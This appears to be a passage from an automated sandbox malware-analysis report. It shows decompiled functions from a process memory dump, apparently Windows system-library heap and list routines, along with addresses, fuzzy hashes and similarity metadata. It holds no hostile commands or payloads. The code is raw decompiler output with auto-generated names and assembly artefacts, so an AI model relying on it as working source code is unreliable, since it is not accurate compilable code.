                                                          0x034aa423
                                                          0x034aa415
                                                          0x0346b3d1
                                                          0x0346b3e8
                                                          0x0346b3e8
                                                          0x0346b3d9

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 07c1843044351eba746821627ba7b681b531f52a119b82e7ebb81e4c62b38885
                                                          • Instruction ID: d9e7babaf84f449ed648892dd9f39d86f001ead234885067dca63213a7bc44dc
                                                          • Opcode Fuzzy Hash: 07c1843044351eba746821627ba7b681b531f52a119b82e7ebb81e4c62b38885
                                                          • Instruction Fuzzy Hash: 94114C377012145FCB29CE569D4156B769AFBD5230B28012FED16CF390CA716C02C7D9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03439240, Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E03439240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x350f708);
				E0348D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E034795D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E034795D0();
				_t33 =  *0x35284c4; // 0x0
				L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x35284c4; // 0x0
				L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x35284c4; // 0x0
				E03452280(L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x35286b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E034795D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E034795D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E03439325();
					_t50 =  *0x35284c4; // 0x0
					return E0348D0D1(L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                          0x03439240
                                                          0x03439242
                                                          0x03439247
                                                          0x0343924c
                                                          0x0343924e
                                                          0x03439255
                                                          0x03439257
                                                          0x0343925a
                                                          0x0343925f
                                                          0x0343925f
                                                          0x03439266
                                                          0x03439271
                                                          0x03439276
                                                          0x03439279
                                                          0x0343927e
                                                          0x03439295
                                                          0x0343929a
                                                          0x034392b1
                                                          0x034392b6
                                                          0x034392d7
                                                          0x034392dc
                                                          0x034392e0
                                                          0x034392e6
                                                          0x034392e8
                                                          0x034392ee
                                                          0x03439332
                                                          0x03439333
                                                          0x03439337
                                                          0x03439338
                                                          0x0343933a
                                                          0x0343933a
                                                          0x0343933d
                                                          0x03439342
                                                          0x03439342
                                                          0x03439345
                                                          0x03439349
                                                          0x0343934e
                                                          0x03439352
                                                          0x03439357
                                                          0x034392f4
                                                          0x034392f4
                                                          0x034392f6
                                                          0x034392f9
                                                          0x03439300
                                                          0x03439306
                                                          0x03439324
                                                          0x03439324

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 038c07557ddbd407f529e0af77320d373aa5c900669c7633f77ce881200e3c40
                                                          • Instruction ID: 8ffcb3c3b2c7dc6d3c2a8312174a8bf94c958318deef4dd56b6b34e4246d97e9
                                                          • Opcode Fuzzy Hash: 038c07557ddbd407f529e0af77320d373aa5c900669c7633f77ce881200e3c40
                                                          • Instruction Fuzzy Hash: 21214876441700DFC722EF69CA40F5ABBB9BF19704F04456EE0498F6A2CB74E941DB89
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034C4257, Relevance: .1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E034C4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x35108d0);
				E0348D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E034C41E8(__ebx, __edi, __ecx, _t39);
				E0344EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x35287e4;
					_t18 =  *0x35287e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x3525cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x35287e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x35287e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L03437055(_t31 + 0xfffffff8);
								_t24 =  *0x35287e0; // 0x0
								_t18 = _t24 - 1;
								 *0x35287e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x3525cd0;
				if( *0x3525cd0 <= 0) {
					L03437055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x35287e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x35287e8 = _t30;
						 *0x35287e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0348D0D1(L034C4320());
			}















                                                          0x034c4257
                                                          0x034c4257
                                                          0x034c4257
                                                          0x034c4259
                                                          0x034c425e
                                                          0x034c4263
                                                          0x034c4265
                                                          0x034c4273
                                                          0x034c4278
                                                          0x034c427c
                                                          0x034c427f
                                                          0x034c4281
                                                          0x034c4287
                                                          0x034c42d7
                                                          0x034c42d7
                                                          0x034c42da
                                                          0x034c428d
                                                          0x034c428d
                                                          0x034c428f
                                                          0x034c4292
                                                          0x034c4297
                                                          0x034c429c
                                                          0x034c42a0
                                                          0x034c42a6
                                                          0x034c42a8
                                                          0x034c42ae
                                                          0x034c42b3
                                                          0x00000000
                                                          0x034c42ba
                                                          0x034c42ba
                                                          0x034c42bf
                                                          0x034c42c5
                                                          0x034c42ca
                                                          0x034c42cf
                                                          0x034c42d0
                                                          0x00000000
                                                          0x034c42d0
                                                          0x034c42b3
                                                          0x00000000
                                                          0x034c42a6
                                                          0x034c429c
                                                          0x034c42dc
                                                          0x034c42dc
                                                          0x034c42e3
                                                          0x034c4309
                                                          0x034c42e5
                                                          0x034c42e5
                                                          0x034c42e8
                                                          0x034c42ee
                                                          0x034c42f0
                                                          0x00000000
                                                          0x034c42f2
                                                          0x034c42f2
                                                          0x034c42f4
                                                          0x034c42f7
                                                          0x034c42f9
                                                          0x034c4300
                                                          0x034c4300
                                                          0x034c42f0
                                                          0x034c430e
                                                          0x034c431f

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a978de6325b40acbe5e0ca73a8061ae086057043bc5c95264ce5963195673d09
                                                          • Instruction ID: 7f3b53ce471259c656852141ab626f4de404545adc7279905eb13aeed6128a8d
                                                          • Opcode Fuzzy Hash: a978de6325b40acbe5e0ca73a8061ae086057043bc5c95264ce5963195673d09
                                                          • Instruction Fuzzy Hash: AF217F78911B40CFC76AEF96D210A14BBB0FB96354B5881AFC1558F3A4D7318446DB08
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03462397, Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 25%
                                                          			E03462397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x352848c != 0) {
					L0345FAD0(0x3528610);
					if( *0x352848c == 0) {
						E0345FA00(0x3528610, _t19, _t27, 0x3528610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E03462581(0x3528610, 0x34150a0, _t26, _t27, _t28);
						E0345FA00(0x3528610, 0x34150a0, _t27, 0x3528610);
					}
				} else {
					L1:
					_t11 =  *0x3528614; // 0x1
					if(_t11 == 0) {
						_t11 = E03474886(0x3411088, 1, 0x3528614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E03462581(0x3528610, (_t11 << 4) + 0x3415070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                          0x034623b0
                                                          0x034623b6
                                                          0x03462409
                                                          0x03462415
                                                          0x034a5ae9
                                                          0x00000000
                                                          0x0346241b
                                                          0x0346241b
                                                          0x0346241d
                                                          0x03462427
                                                          0x0346242e
                                                          0x03462430
                                                          0x03462430
                                                          0x034623b8
                                                          0x034623b8
                                                          0x034623b8
                                                          0x034623bf
                                                          0x034623fc
                                                          0x034623fc
                                                          0x034623c1
                                                          0x034623c3
                                                          0x034623d0
                                                          0x034623d8
                                                          0x034623d8
                                                          0x034623dc
                                                          0x034623de
                                                          0x034623e1
                                                          0x034623e1
                                                          0x034623ec

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5c7696a678a4e6f90734523e925f433c283dc3ecb0248a3b978dbb12627436f
                                                          • Instruction ID: 9fe4f9ceb37690c77db7d646f4953352a8d41f432ed4d6f118f7f274ed4e5301
                                                          • Opcode Fuzzy Hash: f5c7696a678a4e6f90734523e925f433c283dc3ecb0248a3b978dbb12627436f
                                                          • Instruction Fuzzy Hash: 9811E531700714BBD730EA7AAC40F16B68CEBA1650F18485BFA029F291D7F4E845869E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034B46A7, Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E034B46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L03454620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0347F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0346D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L034577F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                          0x034b46b7
                                                          0x034b46ba
                                                          0x034b46c5
                                                          0x034b46c8
                                                          0x034b46d0
                                                          0x034b46d4
                                                          0x034b46e6
                                                          0x034b46e9
                                                          0x034b46f4
                                                          0x034b46ff
                                                          0x034b4705
                                                          0x034b4706
                                                          0x034b470c
                                                          0x034b4713
                                                          0x034b471b
                                                          0x034b4723
                                                          0x034b4725
                                                          0x034b46d6
                                                          0x034b46d9
                                                          0x034b46db
                                                          0x034b46db
                                                          0x034b4732

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                          • Instruction ID: 6d30279080fed436e373ccff206329e8e5028daf4232f9b905c0d4425014e548
                                                          • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                          • Instruction Fuzzy Hash: 4A110675904208BFC701DF5D98809BEBBB9EF85300F10806EF9448F351DA318D55C3A9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034737F5, Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E034737F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E03452280(_t6, 0x3528550);
				}
				_t29 = E0347387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0344FFB0(0x3528550, _t27, 0x3528550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                          0x034737fa
                                                          0x034737fc
                                                          0x03473805
                                                          0x03473808
                                                          0x03473808
                                                          0x03473814
                                                          0x03473818
                                                          0x03473846
                                                          0x03473848
                                                          0x0347384b
                                                          0x0347384b
                                                          0x03473852
                                                          0x00000000
                                                          0x03473854
                                                          0x03473856
                                                          0x00000000
                                                          0x00000000
                                                          0x03473863
                                                          0x00000000
                                                          0x03473863
                                                          0x0347381a
                                                          0x0347381a
                                                          0x0347381f
                                                          0x0347386e
                                                          0x0347386e
                                                          0x03473871
                                                          0x03473873
                                                          0x03473873
                                                          0x03473868
                                                          0x00000000
                                                          0x03473868
                                                          0x03473821
                                                          0x03473826
                                                          0x00000000
                                                          0x00000000
                                                          0x03473828
                                                          0x0347382a
                                                          0x03473841
                                                          0x00000000
                                                          0x03473841

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8809515f75b01690b0bcd2fc2040b239e69ddb3bbf290ead96a8281f4b2ecae4
                                                          • Instruction ID: 67a8e2eb3d69692c0699ae33fdf4e166a8815d8c5c6129474e59bb2669465782
                                                          • Opcode Fuzzy Hash: 8809515f75b01690b0bcd2fc2040b239e69ddb3bbf290ead96a8281f4b2ecae4
                                                          • Instruction Fuzzy Hash: 8101A1BAA016109BC326CE5A9940A67BBEADF85A50B1A44AFE8458F312D730D801D6D8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0343C962, Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 42%
                                                          			E0343C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x352d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0344EEF0(0x35270a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E034BF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0344EB70(_t29, 0x35270a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0347B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E034BF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x35270c0; // 0x0
					while(_t38 != 0x35270c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x352b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                          0x0343c96a
                                                          0x0343c974
                                                          0x0343c988
                                                          0x0343c98a
                                                          0x034a7c9d
                                                          0x034a7c9f
                                                          0x034a7ca4
                                                          0x034a7cae
                                                          0x034a7cf0
                                                          0x034a7cf5
                                                          0x034a7cfa
                                                          0x0343c992
                                                          0x0343c996
                                                          0x0343c997
                                                          0x0343c998
                                                          0x0343c9a3
                                                          0x0343c9a3
                                                          0x034a7cb0
                                                          0x034a7cb7
                                                          0x034a7cbb
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7cbd
                                                          0x034a7ce8
                                                          0x034a7cc5
                                                          0x034a7cc8
                                                          0x034a7cca
                                                          0x034a7cd0
                                                          0x034a7cd6
                                                          0x034a7cde
                                                          0x034a7ce4
                                                          0x034a7ce4
                                                          0x034a7cd0
                                                          0x00000000
                                                          0x034a7ce8
                                                          0x0343c990
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d2e70f7d8548f194828df3650f06594dbdc106a2c3db479e66c95c54962e0a7
                                                          • Instruction ID: 4b49a9d107f71cdc16d52671fc86fa9c8e234471f80af0ac66e36574e85debe2
                                                          • Opcode Fuzzy Hash: 3d2e70f7d8548f194828df3650f06594dbdc106a2c3db479e66c95c54962e0a7
                                                          • Instruction Fuzzy Hash: 9611E331300B019FC720EF6DDC4095B7BE5BB99210F00052EE9458F6A1DB20ED09CBD5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0346002D, Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0346002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E03457D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E03457D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E03457D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E03457D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                          0x03460032
                                                          0x03460037
                                                          0x03460043
                                                          0x034a4b3a
                                                          0x03460049
                                                          0x03460049
                                                          0x03460049
                                                          0x0346004e
                                                          0x03460053
                                                          0x034a4b48
                                                          0x034a4b5a
                                                          0x034a4b4a
                                                          0x034a4b53
                                                          0x034a4b53
                                                          0x034a4b5f
                                                          0x00000000
                                                          0x034a4b61
                                                          0x00000000
                                                          0x034a4b61
                                                          0x03460059
                                                          0x03460059
                                                          0x03460060
                                                          0x034a4b6f
                                                          0x034a4b6f
                                                          0x03460069
                                                          0x034a4b83
                                                          0x00000000
                                                          0x00000000
                                                          0x034a4b90
                                                          0x034a4b9b
                                                          0x034a4b9b
                                                          0x034a4ba4
                                                          0x00000000
                                                          0x00000000
                                                          0x034a4baa
                                                          0x00000000
                                                          0x0346006f
                                                          0x0346006f
                                                          0x00000000
                                                          0x0346006f
                                                          0x03460069

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                          • Instruction ID: e9a9971bbb42917993b9aafb6690e60e763d7d6b8fda49bb062d6e9c956a54df
                                                          • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                          • Instruction Fuzzy Hash: 6E11E531605E808FD722CB2AD544B3A77D8AB41754F0D00F2ED149F7A2D368D841C25D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0344766D, Relevance: .1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 94%
                                                          			E0344766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0346F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0346F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L03454620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                          0x03447672
                                                          0x0344767f
                                                          0x03447689
                                                          0x034476de
                                                          0x034476de
                                                          0x0344768b
                                                          0x03447691
                                                          0x03447693
                                                          0x03447697
                                                          0x00000000
                                                          0x03447699
                                                          0x034476a8
                                                          0x00000000
                                                          0x034476aa
                                                          0x034476ad
                                                          0x034476b1
                                                          0x00000000
                                                          0x034476b3
                                                          0x034476b3
                                                          0x034476b5
                                                          0x034476ba
                                                          0x034476bc
                                                          0x034476bc
                                                          0x034476c0
                                                          0x00000000
                                                          0x034476c2
                                                          0x034476ce
                                                          0x034476ce
                                                          0x034476c0
                                                          0x034476b1
                                                          0x034476a8
                                                          0x03447697
                                                          0x034476d9

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                          • Instruction ID: 2fbcb5cdbc83e3d8f47f7f291589c8c8f696487d8f282b6b4b0168c2217d6913
                                                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                          • Instruction Fuzzy Hash: A7018832700119AFD720DE6EDD41E9BBBAEEB84670B144536B919CF360DB30DD4287A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034CC450, Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 46%
                                                          			E034CC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E03479910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E034795B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E034795D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E034795D0();
				return L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                          0x034cc458
                                                          0x034cc45d
                                                          0x034cc466
                                                          0x034cc468
                                                          0x034cc469
                                                          0x034cc46a
                                                          0x034cc46b
                                                          0x034cc46e
                                                          0x034cc46f
                                                          0x034cc471
                                                          0x034cc476
                                                          0x034cc476
                                                          0x034cc47c
                                                          0x034cc47e
                                                          0x034cc480
                                                          0x034cc480
                                                          0x034cc483
                                                          0x034cc484
                                                          0x034cc486
                                                          0x034cc488
                                                          0x034cc48f
